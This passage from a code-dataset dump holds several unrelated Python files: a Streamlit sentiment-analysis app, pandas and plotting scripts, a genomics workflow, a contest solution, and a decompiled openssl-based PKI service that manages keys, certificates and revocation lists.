'sentiment')\n st.pyplot()\n\n st.markdown('The amount of punctuaton displays a number of outliers in each class at 36, 25, 58 and 20 for classes -1, 0, 1 and 2 whilst the averages for each class are ~ 8, 7, 8 and 9. There is a miniscule difference in the means therefore the number of punctuation per tweet can not be as an unique identifier for any of the sentiment classes.
    Despite classes -1 and 0 having tweets which have the most characters and words, the differences between these two classes and the other classes, and additonally themselves, are not significant enough to use these two characteristics as features when classifying between the four classes in question. As mentioned above, there are no punctuation patterns that are significant to either class.', unsafe_allow_html=True)\n\n st.markdown('### **Wordclouds!** ###')\n\n # call wordcloud generator\n if st.checkbox('generate wordclouds'):\n\n st.markdown('Upon analysis of all the sentiment classes, \"climate change\", \"RT\", \"https\", \"co\" and \"global warming\" are the most popular words/phrases. Even within the individual sentiment classes, the same five words/phrases are the most common.')\n\n sent = list(df['sentiment'].unique())\n dft = eda_data.groupby('sentiment')['clean_tweet'].apply(' '.join)\n for s in sent:\n fig, ax = plt.subplots()\n text = dft[s]\n wordcloud = WordCloud(background_color='white', max_words=100,\n max_font_size=50).generate(text)\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.title('Tweets under {} Class'.format(s))\n plt.axis('off')\n st.pyplot()\n \n if selection == \"Technical\":\n\n ml_img = Image.open(\"resources/imgs/ml_img.png\")\n st.image(ml_img, use_column_width=True)\n \n st.info(\"Here you will find a little more technical info on the models available for prediction\")\n\n tech_inf = markdown(open('resources/vector_model_exp.md').read())\n st.markdown(tech_inf, unsafe_allow_html=True)\n\n st.sidebar.title(\"About\")\n st.sidebar.info(\n \"\"\"\n This app is maintained by EDSA students. It serves as a project\n for a classification sprint.\n\n **Authors:**\\n\n Kennedy Mbono\\n\n Nyandala Ramaru\\n\n Marcus Moeng\\n\n Heinrich De Klerk\\n\n Nombulelo Msibi\\n\n\n\"\"\"\n )\n# Required to let Streamlit instantiate our web app.\nif __name__ == '__main__':\n main()\n","sub_path":"base_app.py","file_name":"base_app.py","file_ext":"py","file_size_in_byte":23268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327634757","text":"import pandas as pd\nimport numpy as np\n\nfrom pandas import Series,DataFrame\n\nnp.random.seed(25)\n\nlinhas = ['linha 1','linha 2','linha 3','linha 4','linha 5','linha 6']\ncolunas = ['coluna 1','coluna 2','coluna 3','coluna 4','coluna 5','coluna 6']\n\ndf = DataFrame(np.random.rand(36).reshape((6,6)),\n index = linhas,\n columns= colunas)\n\nprint(df)\nprint('')\nprint(df < .2)\nprint('')\n\nindice = ['linha 1','linha 2','linha 3','linha 4',\n 'linha 5','linha 6','linha 7','linha 8']\n\nseries_obj = Series(np.arange(8), index=indice)\nfiltro = series_obj > 6\n\nprint(series_obj)\nprint('')\nprint(series_obj[filtro])\n\nseries_obj['linha 1','linha 5','linha 8'] = 8\nprint('')\nprint(series_obj)","sub_path":"FilterData.py","file_name":"FilterData.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"643819032","text":"import os\n\nimport pypeliner\nimport pypeliner.managed as mgd\nfrom wgs.workflows.hmmcopy import tasks\nfrom wgs.utils import helpers\n\n\ndef create_hmmcopy_workflow(\n bam_file, out_dir, global_config, config,\n sample_id, bias_pdf, correction_pdf, hmmcopy_pdf,\n hmmcopy_table, pygenes_table\n):\n\n workflow = pypeliner.workflow.Workflow()\n\n\n workflow.transform(\n name='hmmcopy_readcounter',\n ctx=helpers.get_default_ctx(\n memory=global_config['memory']['low'],\n walltime='2:00', ),\n func=tasks.hmmcopy_readcounter,\n args=(\n mgd.InputFile(bam_file, extensions=['.bai']),\n mgd.TempOutputFile('infile.wig'),\n config,\n )\n )\n\n workflow.transform(\n name='calc_corr',\n func=tasks.calc_corr,\n args=(\n mgd.TempInputFile('infile.wig'),\n mgd.TempOutputFile('infile_copy.txt'),\n mgd.TempOutputFile('infile_copy.obj'),\n config,\n ),\n kwargs={'docker_image': config['docker']['hmmcopy']}\n )\n\n workflow.transform(\n name='run_hmmcopy',\n func=tasks.run_hmmcopy,\n args=(\n mgd.TempInputFile('infile_copy.obj'),\n mgd.TempInputFile('infile_copy.txt'),\n mgd.TempOutputFile('hmmcopy_res.obj'),\n mgd.TempOutputFile('hmmcopy_segments.txt'),\n mgd.OutputFile(hmmcopy_table),\n sample_id,\n config,\n ),\n kwargs={'docker_image': config['docker']['hmmcopy']}\n )\n\n workflow.transform(\n name='plot_hmm',\n func=tasks.plot_hmm,\n args=(\n mgd.TempInputFile('infile_copy.obj'),\n mgd.TempInputFile('hmmcopy_res.obj'),\n mgd.TempSpace('correction_plots_dir'),\n mgd.TempSpace('hmmcopy_plots_dir'),\n mgd.OutputFile(bias_pdf),\n mgd.OutputFile(correction_pdf),\n mgd.OutputFile(hmmcopy_pdf),\n ),\n kwargs={'docker_image': config['docker']['hmmcopy']}\n )\n\n workflow.transform(\n name='annot_hmm',\n func=tasks.annot_hmm,\n args=(\n mgd.TempInputFile('hmmcopy_segments.txt'),\n mgd.OutputFile(pygenes_table),\n config,\n )\n )\n\n return workflow\n","sub_path":"wgs/workflows/hmmcopy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560493124","text":"def read_tokens():\n return input().strip().split(' ')\n\n\ndef read_ints():\n return [int(s) for s in read_tokens()]\n\n\ndef solve(n: int, k: int) -> list:\n ans = []\n if n < k:\n return ans\n\n if n % 2 != 0 and k % 2 == 0:\n return ans\n\n if n % k == 0:\n return [n // k] * k\n\n if n == k:\n return [1] * k\n\n if n % 2 == 0 and k % 2 != 0:\n if n < 2*k:\n return []\n for i in range(k-1):\n ans.append(2)\n ans.append(n - 2*(k-1))\n return ans\n\n if (n % 2 == 0 and k % 2 == 0) or (n % 2 != 0 and k % 2 != 0):\n for i in range(k-1):\n ans.append(1)\n ans.append(n - (k - 1))\n return ans\n\n return []\n\n\nT = int(input())\n\nfor test in range(T):\n n, k = read_ints()\n arr = solve(n, k)\n if len(arr) == 0:\n print(\"NO\")\n continue\n print(\"YES\")\n for el in arr:\n print(el, end=\" \")\n print()\n","sub_path":"contests/640/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"158690466","text":"from pylab import *\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import rc\nrc ('font', **{'family':'sans-serif', 'sans-serif':'Linux Biolinum', 'size':16})\n\ndef float_eq (a, b):\n return abs(a - b) < min (1e-3 * a, 1e-3 * b)\n\n# InA, InB, out\ndata = []\n\nwith open (\"test-dc-out\") as f:\n for line in f:\n ina, inb, out = line.split ()\n ina = float (ina.rstrip(','))\n inb = float (inb.rstrip(','))\n out = float (out.rstrip(','))\n data.append ((ina, inb, out))\n\ndata.sort ()\n\n#######################################\n# Plot: output vs. InA over eight InBs\ninbs = sorted (set (i[1] for i in data))\ninbs_plot = inbs[::len(inbs)//7]\nprint (inbs_plot)\nfor inb in inbs_plot:\n plot_x = [i[0] for i in data if i[1] == inb]\n plot_y = [i[2] for i in data if i[1] == inb]\n\n # Generate a text label on the line\n # First, find the rotation angle for it\n coeffs = polyfit (plot_x, plot_y, 1)\n angle = arctan (coeffs[0]) * (180/pi) * 0.65\n\n # Now, the position\n text_x = 0.6\n text_y = plot_y[17*len(plot_y)//20] * 1.3\n if text_y >= -0.1:\n text_y += 0.025\n else:\n text_y /= 1.4\n text_y += 0.1\n print (text_y)\n\n text (text_x, text_y, 'InB=%.2f V' % inb, rotation=angle)\n plot (plot_x, plot_y, 'b')\n\nxlabel (\"Input A (V)\")\nylabel (\"Multiplier output (V)\")\ntitle (\"Multiplier Transfer Characteristic\")\ngrid ()\nsavefig ('transfer.eps')\nshow ()\n\n#######################################\n# Plot: output vs. InB when InA = 0.25\ninbs = []\nouts = []\nfor ina, inb, out in data:\n if ina > 0.24 and ina < 0.26:\n inbs.append (inb)\n outs.append (out)\n\ncoeffs = polyfit (inbs, outs, 1)\nouts_ideal = [polyval (coeffs, i) for i in inbs]\n\nplot (inbs, outs, 'r', label=\"Measured output\")\nplot (inbs, outs_ideal, 'b', label=\"Ideal output\")\nxlabel (\"Input B (V)\")\nylabel (\"Multiplier output (V)\")\ntitle (\"Transfer Curve and Ideal Response (Input A = 0.25V)\")\ngrid ()\nlegend (loc=2)\nsavefig ('transfer-a25.eps')\nshow ()\n\n\n############################################\n# Plot: output vs. InB error when InA = 0.25\ninbs = []\nouts = []\nfor ina, inb, out in data:\n if ina > 0.24 and ina < 0.26:\n inbs.append (inb)\n outs.append (out)\n\ncoeffs = polyfit (inbs, outs, 1)\nouts_ideal = [polyval (coeffs, i) for i in inbs]\n\nerrors = [(i - j) for i, j in zip (outs, outs_ideal)]\nplot (inbs, errors)\nxlabel (\"Input B (V)\")\nylabel (\"Error\")\ntitle (\"Error\")\ngrid ()\nsavefig ('error.eps')\nshow ()\n\n\n","sub_path":"GilbertCell/testing/generate-plot.py","file_name":"generate-plot.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"495146924","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/mgallet/Github/Penates-Server/penatesserver/pki/service.py\n# Compiled at: 2015-12-29 03:19:15\n\"\"\"\nmy_ca = PKI(dirname=\"/tmp/test\")\nmy_ca.initialize()\nmy_ca.gen_ca(CertificateEntry(\"ca.19pouces.net\", role=CA))\n\"\"\"\nfrom __future__ import unicode_literals, with_statement, print_function\nimport base64, codecs, hashlib, os, datetime, re, shlex, shutil\nfrom subprocess import CalledProcessError\nimport subprocess, tempfile\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.template.loader import render_to_string\nfrom django.utils.text import slugify\nfrom django.utils.timezone import utc\nfrom penatesserver.filelocks import Lock\nfrom penatesserver.pki.constants import ROLES, RSA, RESOURCE, USER, ENCIPHERMENT, SIGNATURE, EMAIL, COMPUTER_TEST, COMPUTER, CA\nfrom penatesserver.utils import t61_to_time, ensure_location\n\ndef local(command, cwd=None):\n return subprocess.check_output(shlex.split(command), shell=False, cwd=cwd, stderr=subprocess.PIPE)\n\n\n__author__ = b'Matthieu Gallet'\n\nclass CertificateEntry(object):\n\n def __init__(self, commonName, organizationName=b'', organizationalUnitName=b'', emailAddress=b'', localityName=b'', countryName=b'', stateOrProvinceName=b'', altNames=None, role=RESOURCE, dirname=None):\n self.commonName = commonName\n self.organizationName = organizationName\n self.organizationalUnitName = organizationalUnitName\n self.emailAddress = emailAddress\n self.localityName = localityName\n self.countryName = countryName\n self.stateOrProvinceName = stateOrProvinceName\n self.altNames = altNames or []\n self.role = role\n self.dirname = dirname or settings.PKI_PATH\n\n @property\n def filename(self):\n basename = b'%s_%s' % (self.role, self.commonName)\n return slugify(basename)\n\n @property\n def values(self):\n return ROLES[self.role]\n\n @property\n def key_filename(self):\n return os.path.join(self.dirname, b'private', b'keys', self.filename + b'.key.pem')\n\n @property\n def pub_filename(self):\n return os.path.join(self.dirname, b'pubkeys', self.filename + b'.pub.pem')\n\n @property\n def ssh_filename(self):\n return os.path.join(self.dirname, b'pubsshkeys', self.filename + b'.pub')\n\n @property\n def sshfp_sha1(self):\n with codecs.open(self.ssh_filename, b'r', encoding=b'utf-8') as (fd):\n method, content = fd.read().split(b' ')\n value = hashlib.sha1(base64.b64decode(content)).hexdigest()\n code = {b'ssh-rsa': 1, b'ssh-dss': 2, b'ecdsa-sha2-nistp256': 3, b'ssh-ed25519': 4}.get(method, 0)\n return b'%s 1 %s' % (code, value)\n\n @property\n def sshfp_sha256(self):\n with codecs.open(self.ssh_filename, b'r', encoding=b'utf-8') as (fd):\n method, content = fd.read().split(b' ')\n value = hashlib.sha256(base64.b64decode(content)).hexdigest()\n code = {b'ssh-rsa': 1, b'ssh-dss': 2, b'ecdsa-sha2-nistp256': 3, b'ssh-ed25519': 4}.get(method, 0)\n return b'%s 2 %s' % (code, value)\n\n @property\n def crt_filename(self):\n return os.path.join(self.dirname, b'certs', self.filename + b'.crt.pem')\n\n @property\n def req_filename(self):\n return os.path.join(self.dirname, b'private', b'req', self.filename + b'.req.pem')\n\n @property\n def ca_filename(self):\n return os.path.join(self.dirname, b'cacert.pem')\n\n @property\n def crt_sha256(self):\n return self.pem_hash(self.crt_filename, hashlib.sha256)\n\n @property\n def pub_sha256(self):\n return self.pem_hash(self.pub_filename, hashlib.sha256)\n\n @property\n def crt_sha512(self):\n return self.pem_hash(self.crt_filename, hashlib.sha512)\n\n @property\n def pub_sha512(self):\n return self.pem_hash(self.pub_filename, hashlib.sha512)\n\n @staticmethod\n def pem_hash(filename, hash_cls=None):\n if hash_cls is None:\n hash_cls = hashlib.sha256\n with codecs.open(filename, b'r', encoding=b'utf-8') as (fd):\n content = fd.read()\n b64_der = (b'').join(content.splitlines()[1:-1])\n der = base64.b64decode(b64_der)\n return hash_cls(der).hexdigest()\n\n def __repr__(self):\n return self.commonName\n\n def __unicode__(self):\n return self.commonName\n\n def __str__(self):\n return self.commonName\n\n\nclass PKI(object):\n\n def __init__(self, dirname=None):\n self.dirname = dirname or settings.PKI_PATH\n self.cacrl_path = os.path.join(self.dirname, b'cacrl.pem')\n self.careq_path = os.path.join(self.dirname, b'private', b'careq.pem')\n self.crt_sources_path = os.path.join(self.dirname, b'crt_sources.txt')\n self.cacrt_path = os.path.join(self.dirname, b'cacert.pem')\n self.users_crt_path = os.path.join(self.dirname, b'users_crt.pem')\n self.hosts_crt_path = os.path.join(self.dirname, b'hosts_crt.pem')\n self.services_crt_path = os.path.join(self.dirname, b'services_crt.pem')\n self.cakey_path = os.path.join(self.dirname, b'private', b'cakey.pem')\n self.users_key_path = os.path.join(self.dirname, b'private', b'users_key.pem')\n self.hosts_key_path = os.path.join(self.dirname, b'private', b'hosts_key.pem')\n self.services_key_path = os.path.join(self.dirname, b'private', b'services_key.pem')\n\n def get_subca_infos(self, entry):\n assert isinstance(entry, CertificateEntry)\n if entry.role in (USER, EMAIL, SIGNATURE, ENCIPHERMENT):\n return (self.users_crt_path, self.users_key_path)\n if entry.role in (COMPUTER, COMPUTER_TEST):\n return (self.hosts_crt_path, self.hosts_key_path)\n if entry.role == CA:\n return (self.cacrt_path, self.cakey_path)\n return (\n self.services_crt_path, self.services_key_path)\n\n def initialize(self):\n with Lock(settings.PENATES_LOCKFILE):\n serial = os.path.join(self.dirname, b'serial.txt')\n index = os.path.join(self.dirname, b'index.txt')\n ensure_location(serial)\n if not os.path.isfile(serial):\n with codecs.open(serial, b'w', encoding=b'utf-8') as (fd):\n fd.write(b'01\\n')\n if not os.path.isfile(index):\n with codecs.open(index, b'w', encoding=b'utf-8') as (fd):\n fd.write(b'')\n ensure_location(os.path.join(self.dirname, b'new_certs', b'0'))\n\n def ensure_key(self, entry):\n \"\"\"\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if not self.__check_key(entry, entry.key_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_key(entry)\n self.__gen_pub(entry)\n self.__gen_ssh(entry)\n elif not self.__check_pub(entry, entry.pub_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_pub(entry)\n self.__gen_ssh(entry)\n elif not self.__check_ssh(entry, entry.ssh_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_ssh(entry)\n\n def ensure_certificate(self, entry):\n \"\"\"\n\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if not self.__check_key(entry, entry.key_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_key(entry)\n self.__gen_pub(entry)\n self.__gen_ssh(entry)\n self.__gen_request(entry)\n self.__gen_certificate(entry)\n elif not self.__check_certificate(entry, entry.crt_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_request(entry)\n self.__gen_certificate(entry)\n\n def __gen_openssl_conf(self, entry=None, ca_infos=None):\n \"\"\"\n principal: used to define values\n ca: used to define issuer values for settings.CA_POINT, settings.CRL_POINT, settings.OCSP_POINT\n temp_object: used to track temporary files and correctly remove them after use\n keyType: used to define issuer values for settings.CA_POINT, settings.CRL_POINT, settings.OCSP_POINT,\n settings.KERBEROS_REALM\n crts: list of revoked Certificate objects\n\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if ca_infos is None:\n ca_crt_path, ca_key_path = self.cacrt_path, self.cakey_path\n else:\n ca_crt_path, ca_key_path = ca_infos\n context = {b'dirname': self.dirname, b'policy_details': [], b'crlPoint': b'', b'caPoint': b'', b'altSection': b'', b'altNamesString': b'', b'krbRealm': b'', b'krbClientName': b'', b'ca_key_path': ca_key_path, b'ca_crt_path': ca_crt_path}\n if entry is not None:\n assert isinstance(entry, CertificateEntry)\n role = ROLES[entry.role]\n for key in ('organizationName', 'organizationalUnitName', 'emailAddress',\n 'localityName', 'stateOrProvinceName', 'countryName', 'commonName'):\n context[key] = getattr(entry, key)\n\n alt_names = list(entry.altNames)\n for k in ('basicConstraints', 'subjectKeyIdentifier', 'authorityKeyIdentifier'):\n context[b'policy_details'].append((k, role[k]))\n\n for k in ('keyUsage', 'extendedKeyUsage', 'nsCertType'):\n context[b'policy_details'].append((k, (b', ').join(role[k])))\n\n if b'1.3.6.1.5.2.3.4' in role[b'extendedKeyUsage'] and settings.PENATES_REALM:\n alt_names.append(('otherName', '1.3.6.1.5.2.2;SEQUENCE:princ_name'))\n context[b'krbRealm'] = settings.PENATES_REALM\n context[b'krbClientName'] = entry.commonName\n if b'1.3.6.1.5.2.3.5' in role[b'extendedKeyUsage'] and settings.PENATES_REALM:\n alt_names.append(('otherName', '1.3.6.1.5.2.2;SEQUENCE:kdc_princ_name'))\n context[b'krbRealm'] = settings.PENATES_REALM\n if alt_names:\n alt_list = [ (b'{0}.{1} = {2}').format(alt[0], i, alt[1]) for i, alt in enumerate(alt_names) ]\n context[b'altNamesString'] = (b'\\n').join(alt_list)\n context[b'altSection'] = b'subjectAltName=@alt_section'\n if settings.SERVER_NAME:\n context[b'crlPoint'] = b'%s://%s%s' % (settings.PROTOCOL, settings.SERVER_NAME, reverse(b'get_crl'))\n context[b'caPoint'] = b'%s://%s%s' % (settings.PROTOCOL, settings.SERVER_NAME,\n reverse(b'get_ca_certificate', kwargs={b'kind': b'ca'}))\n conf_content = render_to_string(b'penatesserver/pki/openssl.cnf', context)\n conf_path = os.path.join(self.dirname, b'openssl.cnf')\n with codecs.open(conf_path, b'w', encoding=b'utf-8') as (conf_fd):\n conf_fd.write(conf_content)\n return conf_path\n\n @staticmethod\n def __gen_key(entry):\n u\"\"\" génère la clef privée pour l'entrée fournie\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(entry.key_filename)\n if role[b'keyType'] == RSA:\n local((b'\"{openssl}\" genrsa -out {key} {bits}').format(bits=role[b'rsaBits'], openssl=settings.OPENSSL_PATH, key=entry.key_filename))\n else:\n with tempfile.NamedTemporaryFile() as (fd):\n param = fd.name\n local((b'\"{openssl}\" dsaparam -rand -genkey {bits} -out \"{param}\"').format(bits=role[b'dsaBits'], openssl=settings.OPENSSL_PATH, param=param))\n local((b'\"{openssl}\" gendsa -out \"{key}\" \"{param}\"').format(openssl=settings.OPENSSL_PATH, param=param, key=entry.key_filename))\n os.remove(param)\n os.chmod(entry.key_filename, 384)\n\n @staticmethod\n def __gen_pub(entry):\n u\"\"\" génère la clef publique pour l'entrée fournie\n la clef privée doit exister\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(entry.pub_filename)\n if role[b'keyType'] == RSA:\n local((b'\"{openssl}\" rsa -in \"{key}\" -out \"{pub}\" -pubout').format(openssl=settings.OPENSSL_PATH, key=entry.key_filename, pub=entry.pub_filename))\n else:\n local((b'\"{openssl}\" dsa -in \"{key}\" -out \"{pub}\" -pubout').format(openssl=settings.OPENSSL_PATH, key=entry.key_filename, pub=entry.pub_filename))\n\n @staticmethod\n def __gen_ssh(entry):\n u\"\"\" génère la clef publique SSH pour l'entrée fournie\n la clef privée doit exister\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n result = local((b'\"{ssh_keygen}\" -y -f \"{inkey}\" ').format(inkey=entry.key_filename, ssh_keygen=settings.SSH_KEYGEN_PATH))\n ensure_location(entry.ssh_filename)\n with open(entry.ssh_filename, b'wb') as (ssh_fd):\n ssh_fd.write(result)\n\n def __gen_request(self, entry):\n u\"\"\" génère une demande de certificat pour l'entrée fournie\n la clef privée doit exister\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n conf_path = self.__gen_openssl_conf(entry)\n role = ROLES[entry.role]\n ensure_location(entry.req_filename)\n local((b'\"{openssl}\" req -out \"{out}\" -batch -utf8 -new -key \"{inkey}\" -{digest} -config \"{config}\" -extensions role_req').format(openssl=settings.OPENSSL_PATH, inkey=entry.key_filename, digest=role[b'digest'], config=conf_path, out=entry.req_filename))\n\n def __gen_certificate(self, entry):\n u\"\"\" génère un certificat pour l'entrée fournie\n la demande de certificat doit exister, ainsi que la CA\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n ensure_location(entry.crt_filename)\n subca_infos = self.get_subca_infos(entry)\n conf_path = self.__gen_openssl_conf(entry, ca_infos=subca_infos)\n role = ROLES[entry.role]\n local((b'\"{openssl}\" ca -config \"{cfg}\" -extensions role_req -in \"{req}\" -out \"{crt}\" -notext -days {days} -md {digest} -batch -utf8 ').format(openssl=settings.OPENSSL_PATH, cfg=conf_path, req=entry.req_filename, crt=entry.crt_filename, days=role[b'days'], digest=role[b'digest']))\n serial = self.__get_certificate_serial(entry.crt_filename)\n with codecs.open(self.crt_sources_path, b'a', encoding=b'utf-8') as (fd):\n fd.write(b'%s\\t%s\\t%s\\t%s\\n' % (serial, os.path.relpath(entry.key_filename, self.dirname),\n os.path.relpath(entry.req_filename, self.dirname),\n os.path.relpath(entry.crt_filename, self.dirname)))\n\n def __gen_ca_key(self, entry):\n \"\"\"\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(self.cakey_path)\n if role[b'keyType'] == RSA:\n local((b'\"{openssl}\" genrsa -out {key} {bits}').format(bits=role[b'rsaBits'], openssl=settings.OPENSSL_PATH, key=self.cakey_path))\n else:\n with tempfile.NamedTemporaryFile() as (fd):\n param = fd.name\n local((b'\"{openssl}\" dsaparam -rand -genkey {bits} -out \"{param}\"').format(bits=role[b'dsaBits'], openssl=settings.OPENSSL_PATH, param=param))\n local((b'\"{openssl}\" gendsa -out \"{key}\" \"{param}\"').format(openssl=settings.OPENSSL_PATH, param=param, key=self.cakey_path))\n os.remove(param)\n os.chmod(self.cakey_path, 384)\n\n def __gen_ca_req(self, entry):\n \"\"\"\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(entry.req_filename)\n conf_path = self.__gen_openssl_conf(entry)\n local((b'\"{openssl}\" req -out \"{out}\" -batch -utf8 -new -key \"{inkey}\" -{digest} -config \"{config}\" -extensions role_req').format(openssl=settings.OPENSSL_PATH, inkey=self.cakey_path, digest=role[b'digest'], config=conf_path, out=entry.req_filename))\n\n def __gen_ca_crt(self, entry):\n \"\"\"\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n conf_path = self.__gen_openssl_conf(entry)\n role = ROLES[entry.role]\n ensure_location(self.cacrt_path)\n local((b'\"{openssl}\" ca -config \"{cfg}\" -selfsign -extensions role_req -in \"{req}\" -out \"{crt}\" -notext -days {days} -md {digest} -batch -utf8 ').format(openssl=settings.OPENSSL_PATH, cfg=conf_path, req=entry.req_filename, crt=self.cacrt_path, days=role[b'days'], digest=role[b'digest']))\n\n def ensure_ca(self, entry):\n u\"\"\" si la clef privée de la CA n'existe pas, crée une nouvelle CA\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if not self.__check_key(entry, self.cakey_path):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_ca_key(entry)\n self.__gen_ca_req(entry)\n self.__gen_ca_crt(entry)\n for sub_name in ('users', 'services', 'hosts'):\n sub_entry = CertificateEntry(b'%s.%s' % (sub_name, entry.commonName), organizationName=entry.organizationName, organizationalUnitName=entry.organizationalUnitName, emailAddress=entry.emailAddress, localityName=entry.localityName, countryName=entry.countryName, stateOrProvinceName=entry.stateOrProvinceName, dirname=entry.dirname, role=CA)\n self.ensure_certificate(sub_entry)\n shutil.copy(sub_entry.crt_filename, getattr(self, b'%s_crt_path' % sub_name))\n shutil.copy(sub_entry.key_filename, getattr(self, b'%s_key_path' % sub_name))\n\n @staticmethod\n def __check_pub(entry, path):\n \"\"\" vrai si la clef publique est valide\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n if not os.path.isfile(path):\n return False\n cmd = b'rsa' if ROLES[entry.role][b'keyType'] == RSA else b'dsa'\n try:\n local((b'\"{openssl}\" {cmd} -pubout -pubin -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, cmd=cmd, path=path))\n except CalledProcessError:\n return False\n\n return True\n\n @staticmethod\n def __check_key(entry, path):\n u\"\"\" vrai si la clef privée est valide\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n if not os.path.isfile(path):\n return False\n cmd = b'rsa' if ROLES[entry.role][b'keyType'] == RSA else b'dsa'\n try:\n local((b'\"{openssl}\" {cmd} -pubout -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, cmd=cmd, path=path))\n except CalledProcessError:\n return False\n\n return True\n\n @staticmethod\n def __check_ssh(entry, path):\n \"\"\" vrai si la clef publique SSH est valide\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n entry = entry\n if not os.path.isfile(path):\n return False\n return True\n\n @staticmethod\n def __check_req(entry, path):\n u\"\"\" vrai si la requête est valide\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n entry = entry\n if not os.path.isfile(path):\n return False\n try:\n local((b'\"{openssl}\" req -pubkey -noout -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, path=path))\n except CalledProcessError:\n return False\n\n return True\n\n def __check_certificate(self, entry, path):\n entry = entry\n if not os.path.isfile(path):\n return False\n else:\n try:\n stdout = local((b'\"{openssl}\" x509 -enddate -noout -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, path=path))\n except CalledProcessError:\n return False\n\n stdout = stdout.decode(b'utf-8')\n end_date = t61_to_time(stdout.partition(b'=')[2].strip())\n after_now = datetime.datetime.now(tz=utc) + datetime.timedelta(30)\n if end_date is None or end_date < after_now:\n return False\n serial = self.__get_certificate_serial(path)\n if serial is None:\n return False\n if self.__get_index_file()[serial][1] != b'V':\n return False\n return True\n\n def revoke_certificate(self, crt_content, regen_crl=True):\n with Lock(settings.PENATES_LOCKFILE):\n with tempfile.NamedTemporaryFile() as (fd):\n fd.write(crt_content.encode(b'utf-8'))\n fd.flush()\n serial = self.__get_certificate_serial(fd.name)\n infos = self.__get_index_file()[serial]\n if infos[1] != b'V':\n return\n conf_path = self.__gen_openssl_conf()\n local((b'\"{openssl}\" ca -config \"{cfg}\" -revoke {filename}').format(openssl=settings.OPENSSL_PATH, cfg=conf_path, filename=fd.name))\n key_filename = os.path.join(self.dirname, infos[5])\n if os.path.isfile(key_filename):\n with open(key_filename, b'rb') as (fd):\n content = fd.read()\n os.remove(key_filename)\n with open(key_filename + b'.bak', b'ab') as (fd):\n fd.write(content)\n req_filename = os.path.join(self.dirname, infos[6])\n if os.path.isfile(req_filename):\n os.remove(req_filename)\n crt_filename = os.path.join(self.dirname, infos[7])\n if os.path.isfile(crt_filename):\n os.remove(crt_filename)\n if regen_crl:\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_crl(20)\n\n @staticmethod\n def __get_certificate_serial(filename):\n cmd = [settings.OPENSSL_PATH, b'x509', b'-serial', b'-noout', b'-in', filename]\n serial_text = subprocess.check_output(cmd, stderr=subprocess.PIPE).decode(b'utf-8')\n matcher = re.match(b'^serial=([\\\\dA-F]+)$', serial_text.strip())\n if not matcher:\n return None\n else:\n return matcher.group(1)\n\n def ensure_crl(self):\n if not self.__check_crl():\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_crl(20)\n\n def __check_crl(self):\n try:\n content = subprocess.check_output([settings.OPENSSL_PATH, b'crl', b'-noout', b'-nextupdate', b'-in',\n self.cacrl_path], stderr=subprocess.PIPE)\n except CalledProcessError:\n return False\n\n key, sep, value = content.decode(b'utf-8').partition(b'=')\n if key != b'nextUpdate' or sep != b'=':\n return False\n return t61_to_time(value.strip()) > datetime.datetime.now(utc) + datetime.timedelta(seconds=86400)\n\n def __gen_crl(self, crldays):\n config = self.__gen_openssl_conf()\n content = subprocess.check_output([settings.OPENSSL_PATH, b'ca', b'-gencrl', b'-utf8', b'-config', config,\n b'-keyfile', self.cakey_path, b'-cert', 